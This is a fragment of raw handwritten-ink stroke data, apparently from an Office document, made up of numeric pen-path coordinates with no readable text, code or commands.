0 0,-8 0 0,-10 0 0,-10 0 0,15 0 0,27 0 0,3 0 0,-18 0 0,-8 0 0,18 0 0,14 0 0,-1 0 0,-30 0 0,27 0 0,-2 0 0,-2 0 0,-12 0 0,21-1 0,3 2 0,-4 4 0,10-4 0,12 9 0,0 1 0,0 1 0,-5 4 0,14-10 0,-1 4 0,20-4 0,1-1 0,5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40:45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6 24575,'-11'-1'0,"-5"-3"0,-7 19 0,4-8 0,-7 9 0,14-10 0,-3 3 0,9-3 0,-4 0 0,9 4 0,-14-4 0,7 0 0,-14 9 0,15-8 0,-8 13 0,13-8 0,-2 3 0,-1-4 0,4 0 0,-4-1 0,0 1 0,4 0 0,-4-1 0,5 1 0,-5 0 0,4 0 0,11-6 0,4 0 0,14 0 0,6 7 0,-2 1 0,3 4 0,11-4 0,-2-1 0,1 0 0,1-5 0,-11 3 0,2-4 0,2 5 0,-6 0 0,-9-5 0,-4 3 0,-14-8 0,-1 4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41:02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764 1 24575,'74'0'0,"-4"0"0,-15 0 0,-4 0 0,6 0 0,-3 0 0,-21 0 0,9 0 0,4 0 0,-18 0 0,18 0 0,6 0 0,15 0 0,-3 0 0,-9 0 0,-2 0 0,-7 0 0,29 0 0,-13 0 0,-5 0 0,-9 0 0,44 0 0,-37 0 0,26 0 0,-55 0 0,-10 0 0,-5 0 0,-5 0 0,-43 0 0,5 0 0,-37 0 0,-1 6 0,-22-5 0,29 5 0,-1 0 0,3-5 0,1 0 0,6 4 0,-1 2 0,-23 0 0,3 0 0,-5 9 0,11-7 0,-12 1 0,9-2 0,20-3 0,2-1 0,-40 3 0,0-1 0,30-6 0,4 0 0,0 2 0,2 1 0,-38-1 0,14 4 0,7-6 0,-14 5 0,22-3 0,-1 3 0,31-5 0,12 0 0,-5 0 0,10 0 0,9 5 0,-3 18 0,10-13 0,0 11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53:04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24575,'16'0'0,"45"0"0,14 0 0,18 0-952,-14 0 1,0 0 951,16 0 205,-36 0-205,31 0 0,-16 0 0,-1 0 411,-3 0-411,26 0 0,-26 0 0,3 0 0,-12 0 0,0 0 0,2 0 0,-7 0 959,-8 0-959,-1 0 328,-3-10-328,17 7 0,-13-7 0,-6 10 0,-4 0 0,-2 0 0,17-6 0,8 5 0,28-5 0,-21 6 0,11 0 0,-38 0 0,-1 0 0,-11 0 0,14-5 0,-12 4 0,7-5 0,-16 6 0,-12 0 0,-5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47:17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47:20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5T14:41:27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1 346 24575,'0'54'0,"0"-1"0,4 2 0,2-6 0,2-7 0,9-8 0,-1-19 0,-4-9 0,9 5 0,-9 0 0,4 0 0,-5-5 0,-5 4 0,3-9 0,-3 4 0,5-5 0,-1-5 0,2-7 0,-6-12 0,-1-7 0,1-14 0,-5-12 0,11-2 0,-6-2 0,1 19 0,3 14 0,-4 17 0,9 6 0,-3 5 0,4 0 0,-1 0 0,2 0 0,10 5 0,-4 6 0,10 23 0,-8 9 0,10 24 0,-10-11 0,5 4 0,-13-30 0,0 2 0,-1-10 0,-4-4 0,3-2 0,-4-22 0,-5-13 0,-1-20 0,-5-39 0,6-16 0,-5 42 0,0 2 0,5-39 0,0-6 0,1 40 0,6-22 0,-2 42 0,-4 16 0,-3 5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47:30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 24575,'0'22'0,"0"43"0,0 7 0,0-20 0,0 3 0,0-1 0,0 0 0,0 42 0,0-42 0,0 0 0,0 4 0,0-1 0,0 0 0,0-1 0,0-4 0,0-2 0,0 36 0,0-19 0,0-19 0,0 3 0,0-29 0,5-11 0,1-6 0,5-5 0,-1 0 0,34-22 0,31-4 0,9-3 0,-27 5 0,1 0 0,5 3 0,6 0 0,-5 2 0,1 3 0,-5 3 0,-12 4 0,4 0 0,20-2 0,10-3 0,-5 3 0,-2 2 0,-1 0 0,18-2 0,-3 1 0,-33 4 0,-9 0 0,2-5 0,-1-2 0,-19-3 0,-15-1 0,-14-34 0,0 6 0,-6-29 0,-7-4 0,-3 10 0,-10-12 0,5-6 0,-6 9 0,17 28 0,-1-1 0,-13-45 0,6 19 0,0 21 0,6 24 0,3 25 0,3 1 0,-5 5 0,-5-5 0,4 4 0,-9-9 0,3 3 0,-28-5 0,-14 0 0,-24-1 0,-15 6 0,48 4 0,1 1 0,0 2 0,-1 0 0,-48 0 0,8 0 0,6 0 0,9 0 0,25 0 0,11 0 0,-4 5 0,16-4 0,-10 4 0,22-5 0,10 0 0,1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47:32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1 620 24575,'30'0'0,"4"0"0,28 0 0,2 0 0,-13 2 0,2 2 0,36 11 0,-36-8 0,0 3 0,19 17 0,7-4 0,-13 5 0,-17-11 0,7 1 0,26 15 0,4 2 0,-11-4 0,0 1 0,-14-3 0,1 1 0,-5-1 0,4 3 0,-7-1 0,-8-1 0,-4 0 0,35 15 0,-24-11 0,-8-11 0,-17-17 0,10-1 0,-14-5 0,7 0 0,-9 0 0,2-21 0,4-11 0,2-29 0,7-25 0,-10 23 0,7-2 0,-14 29 0,9 11 0,30-28 0,-14 28 0,8-4 0,2 2 0,-2 11 0,37-12 0,-54 16 0,-4 2 0,-21-1 0,-7 0 0,-4-5 0,0 4 0,-5-9 0,-12-7 0,3-4 0,-14-4 0,4-10 0,-7-5 0,-5-12 0,-1-4 0,6 12 0,2 2 0,1 7 0,4 11 0,2 8 0,2 11 0,3 10 0,-5 1 0,0 5 0,-5 0 0,-7 5 0,-7 7 0,-29 12 0,28-4 0,-30 12 0,40-18 0,-2 7 0,8-14 0,14-3 0,1-4 0,6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47:33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0 271 24575,'0'22'0,"0"45"0,0-26 0,0 43 0,0-44 0,0 10 0,0 2 0,0 7 0,0 27 0,0-45 0,0-21 0,0 8 0,0-66 0,0 7 0,0-35 0,0-3 0,0 18 0,0-40 0,0 39 0,0-6 0,0 23 0,0 11 0,0 2 0,10 11 0,-3 6 0,13 5 0,-8 0 0,3 0 0,13 22 0,-13-6 0,19 25 0,-21-16 0,29 24 0,-19-21 0,14 4 0,-22-22 0,-4-10 0,0 0 0,-1 0 0,-4-11 0,15-29 0,-1-40 0,6 0 0,-3-15 0,-11 51 0,-5 4 0,3 12 0,-4 4 0,1-9 0,2 15 0,-8-3 0,9 10 0,0 5 0,4 25 0,2-2 0,-3 33 0,6-10 0,-5 14 0,12 0 0,-4 8 0,1 11 0,5 17 0,-3-11 0,-8-28 0,0 0 0,5 24 0,3 10 0,-5-25 0,-8-38 0,-2-6 0,1-9 0,0-3 0,-5-5 0,-2-4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47:35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0 567 24575,'0'11'0,"0"22"0,0-12 0,0 19 0,0-6 0,0-24 0,0-7 0,0-44 0,0-32 0,0-3 0,0-12 0,0-8 0,0 9 0,0-11 0,0 39 0,0 15 0,0 26 0,0-3 0,10 14 0,-3-4 0,8 11 0,6 0 0,3 0 0,5 0 0,-1 0 0,12 22 0,0 24 0,11 33 0,-24-25 0,-2 1 0,5 31 0,-6-26 0,-3-3 0,-4 5 0,1-2 0,1 0 0,1-2 0,0 15 0,-5-41 0,-14-20 0,4-3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47:36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24575,'23'0'0,"0"0"0,17 0 0,-12 0 0,18 0 0,-17 0 0,-3 0 0,-5 0 0,-15 0 0,-2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47:37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1 24575,'-36'0'0,"9"0"0,-5 0 0,11 0 0,-19 0 0,-8 0 0,13 0 0,-18 0 0,21 0 0,7 0 0,-4 0 0,11 0 0,1 0 0,-5 0 0,4 0 0,5 10 0,-3 3 0,15 21 0,-4-9 0,5 15 0,0 2 0,0 15 0,0 11 0,0 22 0,12 3 0,-3-41 0,2-3 0,11 26 0,2-14 0,-7-9 0,-4-23 0,-2 8 0,-1-21 0,-4-4 0,4-2 0,1-5 0,0-5 0,4 0 0,13 0 0,7-10 0,8-4 0,-8-5 0,16-4 0,-7 10 0,-6 1 0,-13 7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47:39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24575,'38'0'0,"7"0"0,20 0 0,11 0 0,5 0 0,7 0-1688,-10 0 0,6 0 0,9 0 1688,-8 0 0,8 0 0,5 0 0,2 0 0,-2 0-918,-12 0 1,2 0-1,0 0 1,0 0-1,-1 0 1,0 0 917,10 0 0,-2 0 0,0 0 0,1 0 0,4 0-208,-3 0 0,7 0 1,1 0-1,-2 0 0,-9 0 1,-14 0 207,-5 0 0,-12 0 0,7 0-282,19 0 0,11 0 0,4 0 1,-3 0 281,-1 1 0,1 1 0,-2 0 0,-3 1 0,-15-1 0,-3 0 0,1 1 0,7 1-178,-5 1 1,8 0-1,4 0 1,-2 1-1,-5 0 1,-11 0 177,8 1 0,-11 0 0,8 2 0,-2 0 0,9 2 0,3 0 0,-4 0 0,-11-1 989,26 1 0,-5 0-989,-10 1 0,3 1 0,-2-2 0,-13-3 0,-1-2 0,-2 0 0,27 3 0,0-1 0,-23-4 0,2 0 0,3-1 0,16 0 0,5-1 0,-2 1 1046,-17 1 0,-2 1 0,11 2-1046,-14 0 0,11 2 0,4 1 0,1 0 0,-4 0 0,-9 0 0,21 4 0,-9 0 0,6 3 179,-17-4 1,6 2 0,2 1 0,-5 1 0,-10 0-180,26 15 0,-13 2 1309,-11-6 0,-2 0-1309,13 8 0,3 0 0,6-1 0,-5-2 0,-35-10 0,-1-1 0,26 4 0,0-3 1097,-27-7 1,-2-4-1098,4-6 0,1-2 0,9 3 0,2-2 0,-5-4 0,0-2 0,-7 1 0,-2 0 1156,44 7-1156,-36-4 0,-1 2 1011,-8 5 1,1 1-1012,19 0 0,-2 0 0,23 11 0,-38-7 0,-6 0 0,-11-5 0,16 6 0,-43-16 0,9 0 0,-9 0 0,4 0 0,-10-5 0,-1 4 0,-5-4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47:41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24575,'5'18'0,"16"19"0,16 2 0,6-1 0,-1-3 0,-13-18 0,-16-4 0,2-2 0,-4-6 0,1-5 0,10 0 0,-10 0 0,10 5 0,0 0 0,3 7 0,12 4 0,-17-4 0,6 9 0,-10-5 0,-9 1 0,2 3 0,-9-8 0,-27 9 0,3-8 0,-24 5 0,-23 6 0,8-4 0,-12 5 0,20-7 0,13 0 0,10-10 0,4 7 0,11-14 0,7 4 0,4 0 0,-4 0 0,9 1 0,-4-1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47:4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24575,'0'80'0,"0"-2"0,16 9 0,6 8 0,-7-17 0,4 0-1426,5-11 1,3 2 0,-3-1 1425,1 13 0,-1-2 584,6-4 0,0 1-584,-4 4 0,-3 2 365,0-6 0,0-2-365,-2-9 0,-2-6 0,1 8 0,2-24 0,-10-35 2248,3 6-2248,-4-14 0,-5 0 0,-2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47:44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1303 24575,'0'-36'0,"19"-9"0,16-20 0,-2-3 0,-7 23 0,1-2 0,-3-6 0,3-2 0,10-13 0,5-6 0,-2 5 0,3-5 0,-4 6 0,2-3 0,-3 2 0,7-11 0,-5 6 0,-4 7 0,-14 29 0,11-11 0,-21 36 0,4-3 0,-5 0 0,19 3 0,-2-4 0,17 11 0,28 2 0,5 2 0,13 2 0,-2 0 0,3 0 0,-32 0 0,-4 0 0,41 0 0,-43 0 0,-1 0 0,37 7 0,-15 6 0,4 1 0,-22-8 0,2 0 0,28 10 0,-2-1 0,-33-11 0,-4-1 0,44 4 0,-16-1 0,-26-6 0,-10 0 0,-17 0 0,-1 0 0,-5 0 0,-7 5 0,-5 1 0,-5 4 0,0 6 0,0 12 0,0 20 0,-19 45 0,11-29 0,-2 4 0,-7 5 0,-1 3 0,3 6 0,0-2 0,1-10 0,0-3 0,2-8 0,2-2 0,-4 27 0,9-36 0,0-23 0,-1-15 0,0 1 0,-4-5 0,4 4 0,-5-9 0,-80 8 0,29-8 0,-2-1 0,0 3 0,-6-1 0,-14-5 0,-9-3 0,12 1 0,30 3 0,-1 0 0,-35-3 0,-15 0 0,13 1 0,32 3 0,4 2 0,-26-1 0,0 0 0,21 0 0,3 0 0,-42 0 0,4 0 0,24 5 0,21 2 0,4 0 0,7 3 0,11-8 0,15 2 0,5-4 0,2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5T14:40:09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874 912 24575,'-22'0'0,"5"0"0,-19-12 0,9 3 0,-6-9 0,-23 0 0,-3 3 0,-5 2 0,-34-4 0,27 5 0,4 3 0,8 9 0,12 0 0,-3 41 0,4 16 0,2 28 0,5-20 0,6 0 0,28 16 0,5-33 0,0 2 0,10 11 0,14-11 0,12 1 0,11-20 0,-11-3 0,19-1 0,-27-18 0,32 7 0,-18-16 0,5-11 0,-2-25 0,-7-31 0,-20 18 0,-2-4 0,4-14 0,-1-1 0,-2-30 0,-1 21 0,-3 4 0,-10 7 0,7-1 0,-2 0 0,-6 5 0,4 4 0,0-2 0,-5-19 0,2 27 0,0-2 0,-3 1 0,0 3 0,0-20 0,0-12 0,0 43 0,0-2 0,0 19 0,0 1 0,0 9 0,6 18 0,7 34 0,1 11 0,5 28 0,-6-24 0,0 2 0,11 26-366,-6-13 1,0-1 365,4-1 0,0 21-51,-8-34 51,0 15 0,10 13 0,-8-28 0,12 29 0,-16-57 0,4 15 0,-10-25 729,4 4-729,-4 16 53,5-15-53,-5 13 0,-1-24 0,-5 0 0,4-5 0,-2 3 0,7-3 0,-3 5 0,0-5 0,-1-2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47:46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24575,'0'46'0,"0"25"0,0-12 0,0-10 0,0 3 0,0-1 0,0 0 0,0 45 0,0-6 0,0-4 0,-6 6 0,4-5 0,1-8 0,7-19 0,1-31 0,-2 4 0,-5-28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47:47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1501 0 13794,'17'40'0,"9"38"2197,-3-33 0,0 5-2197,-6 33 0,-2 0 0,3-33 0,-4-2 0,-9 6 0,-4-7 1870,-1-14-1870,0-5 1026,0-2-1026,0 8 3491,0-5-3491,2 34 0,2 6 0,3-6 0,-4 4 0,1-3 0,6-18 0,-4-24 0,1 11 0,7-8 0,-12-11 0,8 11 0,-10-9 0,-10-4 0,2 4 0,-31 1 0,10 8 0,-13 1 0,3 12 0,-11 13 0,-14 11 0,27-22 0,-1 0 0,2-3 0,0-2 0,-15 27 0,8-8 0,20-18 0,-3 22 0,17-34 0,-6 17 0,15-30 0,-5-1 0,4 1 0,-4 0 0,5-1 0,-5 1 0,4 0 0,-4-1 0,5 1 0,-5 0 0,-1 4 0,-5-3 0,1-1 0,-1-2 0,-17 3 0,8 0 0,-62 17 0,16-8 0,-25 5 0,36-13 0,-2-2 0,-10-2 0,-2-3 0,1 1 0,-1-1 0,-4-2 0,5-2 0,-16-2 0,17 6 0,18 0 0,14 5 0,19 0 0,11 0 0,5-5 0,0-2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47:50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0 469 24575,'0'11'0,"0"-1"0,0 17 0,0-7 0,0 14 0,0-17 0,0 4 0,0-18 0,0-10 0,0-23 0,0 0 0,5-4 0,2 11 0,5-7 0,5-5 0,-4 2 0,4 0 0,4-6 0,-7 17 0,7-9 0,-6 15 0,-3 4 0,4-3 0,-6 4 0,6 0 0,-4 5 0,3 1 0,-4 5 0,0 0 0,-1 0 0,-4 5 0,4 1 0,-9 5 0,4 4 0,-1 2 0,-2 14 0,2-8 0,1-1 0,-4-8 0,4-3 0,-5-15 0,0 1 0,0-20 0,0-11 0,5 8 0,2-8 0,9-3 0,-4 15 0,0-9 0,2 21 0,-7-6 0,8 4 0,-4-4 0,0 5 0,-5 1 0,3 4 0,-3-9 0,5 13 0,0-13 0,-6 9 0,5 0 0,-4 1 0,5 5 0,-5 16 0,3-8 0,-8 19 0,9 11 0,-9-10 0,9 26 0,-8-29 0,2 2 0,-4-6 0,0-9 0,0 4 0,0-6 0,0 1 0,0-5 0,0-1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47:51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0 236 24575,'0'23'0,"0"0"0,0 0 0,0-1 0,0 1 0,0-6 0,0-1 0,0-6 0,0 1 0,0 0 0,0-1 0,0 1 0,5-5 0,5-1 0,2-5 0,4 0 0,-5-5 0,-6-11 0,0 3 0,-5-7 0,0 9 0,0-6 0,0-11 0,0-8 0,0-17 0,0 5 0,0-5 0,0 22 0,0-11 0,0 23 0,-5-13 0,-1 19 0,-4 4 0,-1 9 0,0 0 0,5 0 0,1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47:52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24575,'43'44'0,"3"6"0,-3-17 0,-8-5 0,13 8 0,-9-23 0,-16 4 0,1-11 0,-24-1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47:53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24575,'0'16'0,"0"25"0,0 1 0,0 25 0,0-27 0,0 38 0,0-32 0,0 29 0,0-39 0,0-3 0,0-12 0,0-16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47:54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24575,'0'11'0,"0"19"0,0 8 0,0 33 0,0-17 0,0 7 0,0-23 0,0 8 0,0-18 0,0-1 0,0-22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47:54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47:56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23 24575,'11'0'0,"0"0"0,0 0 0,4 0 0,-3 0 0,-6 0 0,-8 0 0,-14-10 0,4 8 0,-4-9 0,5 11 0,1 0 0,-6 0 0,4 0 0,-4 0 0,1 0 0,3 0 0,-4 0 0,5 0 0,0 0 0,1 0 0,4 5 0,1 6 0,5 23 0,0 3 0,0 22 0,2-7 0,1 0 0,4 5 0,5 33 0,-6-67 0,9 4 0,-8-8 0,9 1 0,-6-14 0,1-1 0,0-5 0,-1 0 0,1 0 0,0 0 0,4 0 0,-3 0 0,3 0 0,1 0 0,1 0 0,-1-5 0,4-1 0,-12-9 0,6-2 0,-8 5 0,0 2 0,-2 10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47:57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1 143 24575,'5'-16'0,"1"8"0,4-7 0,1 14 0,-5-9 0,13 0 0,-11 2 0,12-6 0,-4 8 0,-4 0 0,3-4 0,-4 9 0,4-13 0,-3 11 0,4-11 0,-6 13 0,1-4 0,-5 5 0,-1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5T14:40:11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1 24575,'-17'0'0,"-5"0"0,4 0 0,-6 0 0,7 0 0,-4 0 0,3 0 0,1 0 0,-15 0 0,12 0 0,-7 0 0,5 5 0,14 11 0,-7 3 0,14 9 0,-5 0 0,1-3 0,4 7 0,-4-2 0,5 5 0,0-5 0,0-1 0,5 21 0,6-9 0,2 6 0,8-16 0,0-9 0,-3-5 0,7 4 0,-8-15 0,4-2 0,0-4 0,1 0 0,-5-4 0,3-18 0,-13 2 0,8-23 0,-14-10 0,4 12 0,0-9 0,-4 27 0,5-5 0,-2 9 0,-3-6 0,4 13 0,0-8 0,-4 8 0,9 1 0,-4 6 0,9 10 0,-3 6 0,9 7 0,-8 5 0,26 34 0,-7-15 0,11 28 0,-4-23 0,-16-11 0,0-4 0,-8-20 0,-4-2 0,0-10 0,4 0 0,-3 0 0,3 0 0,-4 0 0,-5 4 0,-1-2 0,-5 2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48:00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24575,'51'0'0,"-3"-5"0,-3-3 0,4 1 0,-1-10 0,-2 14 0,-21-8 0,-4 11 0,-15 15 0,-1 16 0,-5 18 0,-6 18 0,-6-15 0,-24 29 0,8-43 0,-7 19 0,3-24 0,12-13 0,-8 11 0,12-24 0,15 3 0,14-10 0,29 0 0,0 0 0,20 0 0,1 0 0,-5 0 0,5 0 0,-1 0 0,-27 0 0,12 0 0,-20 0 0,-4 5 0,-6-4 0,-8 3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48:01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75 24575,'-23'0'0,"6"0"0,16 5 0,9 2 0,20 19 0,-3-5 0,-3 6 0,5-5 0,-9-5 0,21 6 0,-14 0 0,24 10 0,-7 3 0,0-1 0,-5-2 0,-15-12 0,-10 0 0,2-4 0,-8-6 0,0-2 0,-1-3 0,-5 5 0,0 0 0,-16-1 0,2-4 0,-8-1 0,-5-5 0,13 0 0,-7 0 0,6 0 0,3-5 0,-4-11 0,9-2 0,2-26 0,5 24 0,0-38 0,0 25 0,0-24 0,0 10 0,5 0 0,1 12 0,1 2 0,-2 11 0,-5 1 0,0-1 0,0 5 0,-5 6 0,-1 7 0,-10 4 0,4 0 0,1 0 0,6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48:03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0 24575,'-17'0'0,"5"0"0,-4 0 0,0 0 0,4 0 0,1 5 0,6 1 0,5 5 0,0 4 0,0-3 0,0 3 0,5 6 0,1-8 0,10 7 0,-4-9 0,15 5 0,12 17 0,0 4 0,16 10 0,-19-8 0,-2-5 0,-7-5 0,-10-7 0,-1-7 0,-6-4 0,-4 0 0,-1 0 0,-5-1 0,0 1 0,-5 0 0,-11-1 0,-12 1 0,-7-5 0,7-1 0,7-5 0,10 0 0,0 0 0,-5-15 0,3-4 0,-3-16 0,10-15 0,1 12 0,5-7 0,0 22 0,0-3 0,10-13 0,2 1 0,6-6 0,-3 17 0,-4 5 0,-5 5 0,4 2 0,-9 4 0,8 5 0,-8 1 0,4 5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48:04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 24575,'-24'0'0,"2"0"0,-1 0 0,6 0 0,0 0 0,6 0 0,1 0 0,4 5 0,1 1 0,5 4 0,0 11 0,0-7 0,0 17 0,0-18 0,0 8 0,5 6 0,7-12 0,6 17 0,21-8 0,-5-5 0,14 10 0,-3-9 0,15 16 0,-1 1 0,-6-1 0,-21-8 0,-21-13 0,-6-4 0,-5-1 0,0 1 0,0 0 0,0-1 0,0 6 0,-11-9 0,4 3 0,-25-10 0,17 0 0,-17 0 0,-3 0 0,-3 0 0,-15 0 0,12-16 0,6 2 0,12-24 0,12 8 0,6-22 0,5 20 0,0-15 0,0 6 0,6-21 0,0 16 0,1-5 0,3 18 0,-9 18 0,4-5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48:07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 24575,'-11'0'0,"1"0"0,-6 0 0,4 0 0,-4 0 0,-5 0 0,8 0 0,-14 0 0,15 0 0,-5 5 0,11 11 0,-3-3 0,-3 23 0,5-21 0,-4 11 0,6-5 0,4-8 0,-9 8 0,9-11 0,-4 1 0,5 5 0,0 10 0,0-7 0,28 40 0,47 4 0,-4 7 0,-5-20 0,0-4 0,-5-1 0,18 9 0,-45-26 0,-12-16 0,-11 2 0,-6-8 0,-5 5 0,0 0 0,0-1 0,-11-4 0,-1 4 0,-6-9 0,-8 4 0,13-5 0,-19 0 0,14 0 0,-14-29 0,19 17 0,-1-23 0,14 24 0,0 0 0,0-10 0,0-3 0,0-15 0,5-2 0,1 0 0,10-5 0,-8 21 0,12-17 0,-18 12 0,12-11 0,-13 12 0,4 8 0,-5 5 0,0 4 0,0-3 0,0 4 0,0 5 0,0 1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48:36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1 24575,'-34'0'0,"2"0"0,-4 0 0,-5 11 0,15-8 0,-8 18 0,11 2 0,5-3 0,7 5 0,6-9 0,5-4 0,0 3 0,0-4 0,0-1 0,9 6 0,4-9 0,9 8 0,18-3 0,-2 6 0,5 0 0,-4-1 0,9 1 0,5 7 0,3-5 0,13 19 0,-22-18 0,10 18 0,-23-16 0,-7 15 0,-15-14 0,-2 19 0,-10-19 0,0 3 0,0-2 0,-4-12 0,-2 3 0,-5-11 0,-5-5 0,-1 0 0,-14 0 0,12 0 0,-7 0 0,16 0 0,-1 0 0,5-10 0,1-2 0,5-10 0,0-5 0,0-1 0,0-12 0,0 4 0,-5-19 0,3 27 0,-3-15 0,5 31 0,0-31 0,0 14 0,0-37 0,0 20 0,0 0 0,0 14 0,0 15 0,0 1 0,-5 5 0,-1 1 0,-4 4 0,-1 1 0,5 5 0,1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48:38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24575,'0'16'0,"0"18"0,0 0 0,0 21 0,0 9 0,0-6 0,0 5 0,0-3 0,0-2 0,0 7 0,0-16 0,0 25 0,5-42 0,1 28 0,9-39 0,2-9 0,4-2 0,-4-10 0,-1 0 0,0 0 0,1 0 0,7 0 0,-1 0 0,21-26 0,-16 9 0,11-22 0,-8-10 0,-15 9 0,5-22 0,-16 26 0,-5-35 0,0 38 0,0-28 0,0 38 0,0-1 0,0-20 0,-5 16 0,-1-21 0,-10 25 0,-2-3 0,-9 5 0,-7 10 0,-14-4 0,11 15 0,-24-10 0,33 5 0,-15-5 0,26 0 0,6 5 0,6 1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48:41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24575,'23'0'0,"1"0"0,5 0 0,18 0 0,18 0 0,20 0 0,10 0 0,-23 0 0,3 0 0,5 0 0,7 0 0,-9 0 0,-12 0 0,-5 0 0,6 0 0,-5 0 0,10 0 0,-8 0 0,30 0 0,-35 0 0,1 0 0,-3 0 0,3 0 0,20 5 0,-4 2 0,5 2 0,-24 3 0,-3 1 0,4 2 0,29 4 0,-36-12 0,11 5 0,6-11 0,-6 10 0,21-4 0,-15 6 0,-8-7 0,-16 5 0,11-5 0,-17 1 0,7-3 0,0 1 0,-16 2 0,-2-1 0,-7 3 0,-13-7 0,3 2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48:15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24575,'0'29'0,"5"2"0,12 11 0,-2-3 0,13 2 0,-2 21 0,-6-25 0,4 16 0,-8-25 0,3 3 0,-7-7 0,10-1 0,-14-6 0,8 1 0,1 0 0,-5 3 0,4-9 0,-1 8 0,-3-8 0,4-1 0,-6-6 0,1-26 0,-5-1 0,6-27 0,-11 9 0,11-12 0,-5-43 0,6 13 0,-9 19 0,0 3 0,6-2 0,-8 14 0,8 21 0,-4 14 0,5-8 0,0 15 0,0 1 0,-1 5 0,-4 0 0,-1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48:16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24575,'0'59'0,"0"-19"0,0 58 0,0-61 0,0 53 0,0 1 0,0-43 0,0 38 0,0-74 0,0 0 0,0-7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5T14:37:28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24575,'23'0'0,"14"0"0,28 0 0,-12 0 0,-3 0 0,3 0 0,43 0 0,-32-12 0,7-6 0,-6 2 0,-9 6 0,-2-1 0,24-14 0,-10 1 0,-35 8 0,-13 15 0,12-4 0,-19 5 0,-2 0 0,-6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5T14:40:1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24575,'0'4'0,"0"8"0,0 16 0,0 18 0,0-14 0,0 15 0,0-16 0,0 0 0,0 14 0,0-18 0,0 10 0,0-3 0,0-15 0,0 8 0,0-12 0,0-3 0,0 8 0,0-2 0,0 4 0,5 18 0,2-6 0,6 14 0,10 10 0,-9-11 0,8 0 0,-15-21 0,2-15 0,-8 0 0,9-5 0,-4-2 0,9-4 0,-3 0 0,3 5 0,6 6 0,-8-4 0,7 7 0,1-13 0,-8 4 0,8-5 0,-10 0 0,0 0 0,19-5 0,10-15 0,-3 10 0,3-15 0,-28 24 0,-1-4 0,-7 5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48:17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24 24575,'20'0'0,"7"-5"0,15-2 0,-4 1 0,-16 1 0,-4 5 0,3 0 0,-4 0 0,0 0 0,-1 0 0,-6 0 0,1 0 0,-5 4 0,-1 7 0,-5 1 0,0 9 0,0-9 0,0 10 0,0-4 0,-11 5 0,-2 0 0,-5 0 0,-25 21 0,15-11 0,-31 21 0,43-34 0,7-6 0,22-20 0,13-5 0,8-6 0,-6 9 0,18-9 0,-4 10 0,2 0 0,-2 2 0,-8 5 0,-6 0 0,0 0 0,-5 0 0,-2 0 0,-15 4 0,-2 7 0,-4 6 0,0 4 0,0 11 0,-10-7 0,2 7 0,-14-9 0,-13 6 0,-19 12 0,3-16 0,-2 0 0,-18 13 0,-17-3 0,46-23 0,10 0 0,-2-5 0,11-2 0,5-5 0,6 9 0,8-6 0,4 6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48:19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0 168 24575,'0'16'0,"0"5"0,0-3 0,0 10 0,0-4 0,0 4 0,0-5 0,0 3 0,0-7 0,0 1 0,0-10 0,0 6 0,5-9 0,1 7 0,15-3 0,13 12 0,8-10 0,-1 2 0,7-15 0,-16 0 0,8 0 0,-8-15 0,-8-9 0,-7-7 0,-1-26 0,-14 22 0,3-37 0,-5 20 0,0-4 0,0 1 0,-5 33 0,-1-7 0,-9 23 0,-2-5 0,-10 0 0,-2 4 0,-5-3 0,-6 9 0,5-4 0,1 5 0,6 0 0,12 0 0,0 0 0,10 0 0,1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48:20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24575,'42'23'0,"-10"-4"0,8 10 0,-5 0 0,-3-9 0,-4-3 0,-7-7 0,-9-9 0,3 4 0,1-5 0,-4 0 0,3 0 0,-4 0 0,-1 0 0,1 0 0,-5 0 0,-1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48:21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0 24575,'0'37'0,"0"4"0,0-22 0,0 9 0,0-5 0,0 17 0,0-13 0,0 27 0,0-16 0,0 12 0,0-8 0,0 11 0,-6-11 0,-5 17 0,-2 0 0,-4-14 0,5-1 0,-4-13 0,4-16 0,1 4 0,6-19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48:32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3536 24575,'37'-6'0,"3"-7"0,31-17 0,6-16 0,-8 9 0,7-4 0,5-9 0,2-1-1979,1 7 1,0 1 1978,-3 2 0,-2 3 0,-21 10 0,8 0 0,8 2 0,16-3 0,3-1 0,-11 4 0,-13 2 0,-5 2 0,5-1-479,14-6 0,9-3 0,-1 2 0,-14 5 479,-6 7 0,-7 1 0,14-16 0,0-2 16,-16 12 1,0 0-17,15-11 0,2-2 0,0 1 0,6 0 0,-2 3 0,6-1 0,-3 2 0,-19 6 0,-3 1 0,2 0 439,16-4 1,2 0 0,-4 2-440,5-2 0,-7 2 344,-10 3 1,1 0-345,20-6 0,-1 1 0,-18 2 0,-3 2 692,-4 7 0,1-1-692,24-14 0,-2 1 0,-31 16 0,-2 0-312,24-11 0,-4 1 312,1 2 0,7 0 141,-10-4-141,1 4 0,0 1 960,-21 3 0,3-2-960,-3 0 0,2-2 0,32-22 0,0-3 0,-28 12 0,-1-2 0,1 0 0,5-5 0,-4 2 0,8-8 0,-1 1 0,-10 9 0,3-1 0,1 0 0,0 2 0,0 0 0,-1 3 0,14-8 0,-1 3 0,16-1 0,-7 4 0,-3 0 0,10-3 46,-58 3-46,-4 19 0,32-7 0,11 2 0,19 4-187,-16 8 0,1 0 187,-17-4 0,-3 1-156,40-2 156,4-8 0,0-3 0,0 5 0,-2-12 0,-37 19 0,2 1 0,-5-3 0,-1 1 532,-2 2 1,-1 1-533,0 2 0,-1 1 430,35-9-430,-8 1 0,-19 4 0,15-14 0,-30 19 0,24-17 0,-31 18 0,17-9 0,-10 0 0,24 4 0,-6-10 0,-9 15 0,2-7 0,-28 9 0,8-5 0,-16 5 0,-1-4 0,4 4 0,-2-5 0,19 0 0,24-16 0,-24 12 0,30-12 0,-53 21 0,12 2 0,-20 4 0,-1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48:34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24575,'16'0'0,"40"0"0,-9 0 0,31 0 0,8 25 0,-24-7 0,24 22 0,-22-8 0,-6 3 0,7-1 0,0 5 0,-23-18 0,-1 2 0,-9-7 0,-13-8 0,4 6 0,-13-8 0,-10 5 0,0 0 0,0-1 0,-5 6 0,-13 2 0,-1-1 0,-17 7 0,-23 11 0,-19 16 0,1-5 0,6-1 0,37-22 0,12-6 0,11-2 0,6-4 0,5 0 0,0-5 0,0-2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48:53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490 0 24575,'-18'0'0,"-9"16"0,13-2 0,-24 30 0,23-17 0,-12 6 0,5-7 0,14-7 0,-8 4 0,16-7 0,5-10 0,6-2 0,1-4 0,8 0 0,-8 0 0,3 0 0,1 10 0,-4-3 0,3 9 0,-9 4 0,-1-7 0,-5 7 0,0-4 0,0 6 0,0 6 0,0 6 0,-10 0 0,2-6 0,-13 5 0,4-11 0,-10 6 0,-17 4 0,11-12 0,-13 2 0,-2-1 0,7-11 0,-45 17 0,61-25 0,-3 3 0,64-16 0,2-11 0,29 0 